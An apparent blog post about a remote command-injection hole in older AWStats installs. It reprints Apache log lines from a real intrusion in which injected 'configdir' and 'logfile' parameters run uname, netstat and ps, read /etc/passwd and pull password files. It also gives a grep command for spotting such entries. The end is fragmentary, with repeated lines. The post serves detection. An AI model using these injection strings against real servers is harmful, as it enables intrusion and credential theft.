Many webservers running AWStats are remote exploitable
So basically if you run AWStats to parse your weblogs and installed it before year 2005... Well then have fun and use this if you forget the ftp password to your webserver..http://www.securiteam.com/exploits/5ZP0F1FF5U.html How to know if someone have abused my AWStats installation?
If your apache weblogs looks like this:
boras.tokroot.com - - [20/Nov/2005:00:46:32 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?pluginmode=:system(\"echo+SILENTIUM;uname%20-a;echo+anacron_group_italy\"); HTTP/1.0" 200 776
boras.tokroot.com - - [20/Nov/2005:00:46:38 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;uname%20-a;echo+anacron_group_italy;echo| HTTP/1.0" 200 580
boras.tokroot.com - - [20/Nov/2005:00:46:48 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?update=1&logfile=|echo;echo+SILENTIUM;uname%20-a;echo+anacron_group_italy;echo| HTTP/1.0" 200 219
boras.tokroot.com - - [20/Nov/2005:00:46:52 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;uname%20-a;echo+anacron_group_italy;echo| HTTP/1.0" 200 580
boras.tokroot.com - - [20/Nov/2005:00:46:58 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;who;echo+anacron_group_italy;echo| HTTP/1.0" 200 541
boras.tokroot.com - - [20/Nov/2005:00:47:04 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;pwd;echo+anacron_group_italy;echo| HTTP/1.0" 200 574
boras.tokroot.com - - [20/Nov/2005:00:47:19 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;cat%20%2fetc%2fpasswd;echo+anacron_group_italy;echo| HTTP/1.0" 200 6314
boras.tokroot.com - - [20/Nov/2005:00:50:27 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fmnt%2fdemoscene;echo+anacron_group_italy;echo| HTTP/1.0" 200 640
boras.tokroot.com - - [20/Nov/2005:00:50:43 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fhome;echo+anacron_group_italy;echo| HTTP/1.0" 200 1054
boras.tokroot.com - - [20/Nov/2005:00:51:39 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fhome%2fcore;echo+anacron_group_italy;echo| HTTP/1.0" 200 551
boras.tokroot.com - - [20/Nov/2005:00:51:44 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fhome;echo+anacron_group_italy;echo| HTTP/1.0" 200 1054
boras.tokroot.com - - [20/Nov/2005:00:52:12 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fvar%2fwww;echo+anacron_group_italy;echo| HTTP/1.0" 200 753
boras.tokroot.com - - [20/Nov/2005:00:52:27 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fvar%2fwww%2fpasswords;echo+anacron_group_italy;echo| HTTP/1.0" 200 629
boras.tokroot.com - - [20/Nov/2005:00:52:46 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;cat%20%2fvar%2fwww%2fpasswords%2fpassword.file;echo+anacron_group_italy;echo| HTTP/1.0" 200 598
boras.tokroot.com - - [20/Nov/2005:00:53:02 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fvar%2fwww%2fpasswords;echo+anacron_group_italy;echo| HTTP/1.0" 200 629
boras.tokroot.com - - [20/Nov/2005:00:53:36 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;cat%20%2fvar%2fwww%2fpasswords%2fzx81.password.file;echo+anacron_group_italy;echo| HTTP/1.0" 200 597
boras.tokroot.com - - [20/Nov/2005:00:54:46 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;cat%20%2fvar%2fwww%2fpasswords%2fgroup.file;echo+anacron_group_italy;echo| HTTP/1.0" 200 598
boras.tokroot.com - - [20/Nov/2005:00:55:17 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2f;echo+anacron_group_italy;echo| HTTP/1.0" 200 655
boras.tokroot.com - - [20/Nov/2005:00:55:23 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fftp;echo+anacron_group_italy;echo| HTTP/1.0" 200 716
boras.tokroot.com - - [20/Nov/2005:00:56:34 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fetc%2fpasswd;echo+anacron_group_italy;echo| HTTP/1.0" 200 564
boras.tokroot.com - - [20/Nov/2005:00:56:39 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;cat%20%2fetc%2fpasswd;echo+anacron_group_italy;echo| HTTP/1.0" 200 6314
boras.tokroot.com - - [20/Nov/2005:00:59:13 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;uname%20-a;echo+anacron_group_italy;echo| HTTP/1.0" 200 580
boras.tokroot.com - - [20/Nov/2005:01:01:04 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fhome;echo+anacron_group_italy;echo| HTTP/1.0" 200 1054
boras.tokroot.com - - [20/Nov/2005:01:01:16 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fhome%2feuphoria;echo+anacron_group_italy;echo| HTTP/1.0" 200 745
boras.tokroot.com - - [20/Nov/2005:01:02:21 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fhome;echo+anacron_group_italy;echo| HTTP/1.0" 200 1054
boras.tokroot.com - - [20/Nov/2005:01:02:48 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fhome%2fvoid;echo+anacron_group_italy;echo| HTTP/1.0" 200 663
boras.tokroot.com - - [20/Nov/2005:01:03:01 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;cat%20ps%20aux;echo+anacron_group_italy;echo| HTTP/1.0" 200 548
boras.tokroot.com - - [20/Nov/2005:01:03:16 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20-l%20%2fhome%2fvoid;echo+anacron_group_italy;echo| HTTP/1.0" 200 775
boras.tokroot.com - - [20/Nov/2005:01:03:31 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;netstat;echo+anacron_group_italy;echo| HTTP/1.0" 200 5357
boras.tokroot.com - - [20/Nov/2005:01:07:37 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fhome%2fmcdrill;echo+anacron_group_italy;echo| HTTP/1.0" 200 554
boras.tokroot.com - - [20/Nov/2005:01:08:13 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fhome%2fjason;echo+anacron_group_italy;echo| HTTP/1.0" 200 583
boras.tokroot.com - - [20/Nov/2005:01:08:23 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fhome%2fjason%2fBitchX;echo+anacron_group_italy;echo| HTTP/1.0" 200 578
boras.tokroot.com - - [20/Nov/2005:01:08:30 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;cat%20%2fhome%2fjason%2fBitchX;echo+anacron_group_italy;echo| HTTP/1.0" 200 32778
boras.tokroot.com - - [20/Nov/2005:01:08:33 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;cat%20%2fhome%2fjason%2fBitchX;echo+anacron_group_italy;echo| HTTP/1.0" 200 32778
boras.tokroot.com - - [20/Nov/2005:01:13:42 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;cat%20%2fhome%2fdoofy;echo+anacron_group_italy;echo| HTTP/1.0" 200 553
boras.tokroot.com - - [20/Nov/2005:01:13:48 +0100] "GET /cgi-bin/awstats/cgi-bin/awstats.pl?configdir=|echo;echo+SILENTIUM;ls%20%2fhome%2fdoofy;echo+anacron_group_italy;echo| HTTP/1.0" 200 552
boras.tokroot.com in this case) have done.
$ cat access_log | grep awstats | grep echo
NEON in the weblog :)stay tuned for more... Referens till aktuell sida
boras.tokroot.com in this case) have done.